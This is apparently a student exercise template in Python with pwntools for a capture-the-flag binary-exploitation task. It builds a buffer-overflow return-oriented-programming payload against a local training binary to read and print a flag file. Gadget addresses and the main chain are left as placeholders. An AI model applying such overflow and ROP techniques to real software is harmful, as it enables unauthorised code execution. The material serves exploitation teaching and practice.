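"""Exercise template: drive ./deprivileged locally and print a global buffer.

The `???` markers are placeholders left by the exercise author; the file is
not valid Python until each of them is replaced.
"""
from pwn import *
import os

# The flag file is exposed under the name 'good luck' via a symlink.
# On a re-run the link already exists (FileExistsError), which is the only
# failure that is safe to ignore silently. Any other OS error (permissions,
# filesystem without symlink support, ...) is reported, because the rest of
# the script relies on that name being present.
try:
    os.symlink('flag', 'good luck')
except FileExistsError:
    pass
except OSError as err:
    log.warning("could not create symlink 'good luck' -> 'flag': %s", err)

# Load the target binary once and start it as a local child process.
e = ELF('./deprivileged')
p = process(e.path)

# Show whatever the program prints first.
# NOTE(review): recv() returns whatever is buffered at that moment, so the
# output may be partial.
print(p.recv())

# one global location.
# Address of the binary's `good_luck` symbol, taken from its symbol table.
global_addr = e.symbols['good_luck']

# Exercise placeholders: addresses to be supplied by the student.
p_rdi_ret = ???
p_rsi_r15_ret = ???

# 40 filler bytes precede the chain.
# NOTE(review): the offset is fixed by the exercise - confirm it against the
# binary.
payload = b'a' * 40

# TODO: construct payload to read flag (symlinked to 'good luck') and copy it
# to global_addr
payload += ???

# output global_addr using puts call.
# Symbols are resolved through `e`, the same ELF object used for global_addr,
# so both lookups come from one place.
payload += p64(p_rdi_ret) + p64(global_addr) + p64(e.symbols['puts'])

p.sendline(payload)
p.interactive()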